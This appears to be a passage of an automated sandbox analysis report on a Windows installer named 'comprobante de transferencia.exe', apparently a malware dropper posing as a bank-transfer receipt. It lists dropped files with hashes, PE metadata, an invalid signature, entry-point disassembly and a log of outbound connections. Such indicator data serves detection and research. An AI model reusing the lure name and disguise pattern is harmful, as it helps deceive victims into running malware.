Preview:	...Y..[..-.........<..\.....IB......................}-.....................?.....a.......}..........,..........1...>..........9\|\|...........&.....!.....T.................h....;....G............./N................G....................!..E...........:...0............=.......................,........l...'..............e...........Z..I..H...M..>...p..........j....S.].....................r..........v..........................l.......ad......q!.....b.4...(...............3............h..................^...........^...................b........................~.......^n.........e...................&.....................................H......6.................j....S..e........g..........H........5...........)...............,....8_..................7................Z.........o.n.......W....4...t.....\|..........2.....o...............................y..%..n........hh....0....X...{...W..$...9..l..........*.............Ji..........I.........\|...........F.....\|......G.4....M.0Y.8...............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Rygklappers.Bly

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	246330
Entropy (8bit):	7.79519904417669
Encrypted:	false
SSDEEP:	3072:5iozhsOrvBM0JN38MXONVHVLufMX6tNMBlZ2FNaCpRvpE9lh81Kf6iWPARBAEPMN:5tSwjRXYotKBl8FkKRC9lH6idLO6OaQ
MD5:	005464858B128A2A613D56386FA5297D
SHA1:	03CD9F513B21FADBD019F3F3AA2D2D2B9A14116E
SHA-256:	95E1306E687940A010BE1CD61F849601C2987399AA659DC86D5707BEA3BA76E1
SHA-512:	067208881D541BAF04C6B11F727891B2928CE34C4EDB3B219944DFF5F6C93A1640635E738364707724D5EBB7D7D6AFC9A9D4243A8176F3CAC5EB3E51BA9ACE08
Malicious:	false
Preview:	...........ss.....jjjj....III.................r........................EEEEE..g...}......<...))..........3..................................................f...f......:p..9..............................................................=............................................................r<.......F...m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::4.f......_..44................................................................................................f....k...v(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.....h...h..Mnx.Tqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqf........Z...J$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......f.s...>..(IYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY...........bnM.hpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp...f.s.=.HP..BNNNNNNNNN

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Undervisningsform.bek

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	272352
Entropy (8bit):	3.2380792387673005
Encrypted:	false
SSDEEP:	3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
MD5:	93A04CCDF51474B877C9414AE5AD2760
SHA1:	1321C10A4CC69A33235C87ABF2779A57619533BB
SHA-256:	D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
SHA-512:	675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
Malicious:	false
Preview:	..........................................................................&....\..................+.\.......8.@.......+...?d.."...B.............................;....................:..6.....f......h...................n...L.....................m..........$...................4...........Yf.......................+.......P......'..u...........4.......S....K*......!.........1h.....'........................F........AJQ.........P.......k.........8.......Z...B......Z#c........h.....................U.......a....j.......e..!~..C....n!..8.......B........................-...f......y.q.....,....Y........i.........1..~.....c................cQ..............g.z..........................................X........}..........................V.........8...............p....Q..f. .............................^.....).............................o..........^............?......8........................4......................X...........................7S.....O..................p......>......................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\floddeltaets.mar

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	207086
Entropy (8bit):	3.2412864519720883
Encrypted:	false
SSDEEP:	3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
MD5:	1171715CBB2206BFF607138FEF73877F
SHA1:	D7059E4A741A345239A17FE037C8605D4219E28C
SHA-256:	27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
SHA-512:	69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
Malicious:	false
Preview:	...F...$>..........$.K...\.........................'M.......G.......h...4....4..............85......o.}..........e....................<.............H..........l.....DY...c...........N...6...]...n..............................2..q..I....W....................8........-.......2...K..............J..%<.....O..]...m.......H.......z..........................9s........!......s..8.................u..............y.gS................v...`...........a........Q...... .....................j............G...........~.................... ................b.........q...v............p..............S..........{.............c.......#!..........;...................=6.R...1.....6.....t.9...........9....4................9..p.....Y...0..........\|...........U..........,......W...~.......d.&.......k{.B.......r......3...w.:..[.^$_...........s.........)....,l..P..........9......{........b......................y...u..C............/..............d..:..............................6.>.#.......>.I2.y.............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\kannevasen.txt

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.317248216463251
Encrypted:	false
SSDEEP:	12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
MD5:	9F716DE9908957BD324DCC4ADA5A33F7
SHA1:	5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
SHA-256:	CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
SHA-512:	0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
Malicious:	false
Preview:	reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.986983955561028
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	comprobante de transferencia.exe
File size:	800'824 bytes
MD5:	8a1422827315b9db63cd6b399a454fab
SHA1:	235c6e8149097f00ac26e70b0022c7b5a2f49c1d
SHA256:	2d49a4fcfdf17af26d78ec4eea4eb75176ab9918c7644855d4d80454ce7382c0
SHA512:	1d48248911e937157eb2147456e7ff508936257916412533ef1c80a2b9f67790f46f178b28014b17d73a3727653b3f26228952cd2802c90800760a74959aae66
SSDEEP:	12288:nqLWnK6qSn2bcfB/5FsfecOs8c3ObwMB8aqEEbViGCyQRy1/6dzgA6zZxfb5R9A:8WnVD5h5FoFJBoZyQqNbbfNQ
TLSH:	8A0523261283A041F9E584F54AD7B336DD70A7D94136EB0E6F751ABA2504B22CF243BF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x40326a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e2a592076b17ef8bfb48b7e03965a3fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Dwarves@eksportmarkeder.Tri, O=Kongefloderne, OU="Palaeodendrologist Linated ", CN=Kongefloderne, L=Leivasy, S=West Virginia, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	05/02/2024 04:48:36 04/02/2027 04:48:36
Subject Chain	E=Dwarves@eksportmarkeder.Tri, O=Kongefloderne, OU="Palaeodendrologist Linated ", CN=Kongefloderne, L=Leivasy, S=West Virginia, C=US
Version:	3
Thumbprint MD5:	A84745518FBDCF236D8B362BDC042931
Thumbprint SHA-1:	EF6135327AF598B98077D3B6778630318A274FCA
Thumbprint SHA-256:	57AB6697E2DF0E8CA942FF7C261CB088CB53666DBA46EF8052FA83F02D970B2D
Serial:	4714A48C7EED8FC800CFB1095DD34591AD152D1B

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 004092E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F4780ADDDE3h
push ebx
call 00007F4780AE0F24h
cmp eax, ebx
je 00007F4780ADDDD9h
push 00000C00h
call eax
mov esi, 004072B8h
push esi
call 00007F4780AE0E9Eh
push esi
call dword ptr [0040715Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F4780ADDDBCh
push ebp
push 00000009h
call 00007F4780AE0EF6h
push 00000007h
call 00007F4780AE0EEFh
mov dword ptr [00429204h], eax
call dword ptr [0040703Ch]
push ebx
call dword ptr [004072A4h]
mov dword ptr [004292B8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004206A8h
call dword ptr [00407188h]
push 004092C8h
push 00428200h
call 00007F4780AE0AD8h
call dword ptr [004070A8h]
mov ebp, 00434000h
push eax
push ebp
call 00007F4780AE0AC6h
push ebx
call dword ptr [00407174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x67000	0xb48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc1d20	0x1b18
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ff9	0x6000	34f0469eb860d5ecf0e52ef9d3820a60	False	0.6667073567708334	data	6.4734859396670705	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x13a4	0x1400	848ecd58951d0a4cfe8ec8cfce6b20d1	False	0.452734375	data	5.125569346027248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202f8	0x600	3953dbb7217e7539ee75e90871f7aef9	False	0.4947916666666667	data	3.9050018847265378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x3d000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x67000	0xb48	0xc00	737bf22e330f1bb677a1a75bfb3076c2	False	0.4215494791666667	data	4.359435247089545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x671c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x674a8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x675a8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x676c8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x67790	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x677f0	0x14	data	English	United States	1.2
RT_MANIFEST	0x67808	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2024 15:06:44.187952995 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.187973022 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.188138008 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.201850891 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.201879978 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.484978914 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.485115051 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.485192060 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.485944986 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.486078978 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.554874897 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.554883003 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.555110931 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.555238008 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.558010101 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.600605011 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.779589891 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.779712915 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.779764891 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.779843092 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.781260014 CET	49784	443	192.168.11.20	142.251.40.142
Mar 18, 2024 15:06:44.781271935 CET	443	49784	142.251.40.142	192.168.11.20
Mar 18, 2024 15:06:44.915218115 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:44.915245056 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:44.915505886 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:44.916095018 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:44.916110039 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.127846003 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.128058910 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.128058910 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.133785963 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.133801937 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.134341955 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.134496927 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.134900093 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.176569939 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.675909996 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.676068068 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.676068068 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.676115036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.682615042 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.682786942 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.682786942 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.682807922 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.695477009 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.695689917 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.702162027 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.702435017 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.770195007 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.770525932 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.770538092 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.770778894 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.773463964 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.773689985 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.773700953 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.773931980 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.780162096 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.780375957 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.780388117 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.780548096 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.786660910 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.786874056 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.786886930 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.787144899 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.793369055 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.793581963 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.793595076 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.793829918 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.799920082 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.800132036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.800143957 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.800334930 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.806499004 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.806710958 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.806723118 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.806974888 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.813143969 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.813385963 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.813397884 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.813592911 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.819250107 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.819451094 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.819463968 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.819662094 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.825200081 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.825402021 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.825413942 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.825630903 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.831336021 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.831541061 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.831553936 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.831763029 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.837760925 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.838001013 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.838057041 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.838293076 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.843724966 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.843961954 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.846930027 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.847178936 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.847239971 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.847485065 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.847542048 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.847801924 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.865192890 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.865421057 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.865478039 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.865684032 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.867501020 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.867744923 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.867801905 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.868036985 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.872294903 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.872545004 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.872626066 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.872886896 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.876513004 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.876708031 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.876770973 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.877055883 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.880790949 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.881032944 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.881122112 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.881319046 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.885081053 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.885274887 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.885338068 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.885535955 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.885575056 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.885740995 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.889368057 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.889564991 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.889628887 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.889897108 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.893570900 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.893750906 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.893815994 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.894057989 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.897949934 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.898134947 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.898197889 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.898396969 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.902143955 CET	443	49785	142.251.41.1	192.168.11.20
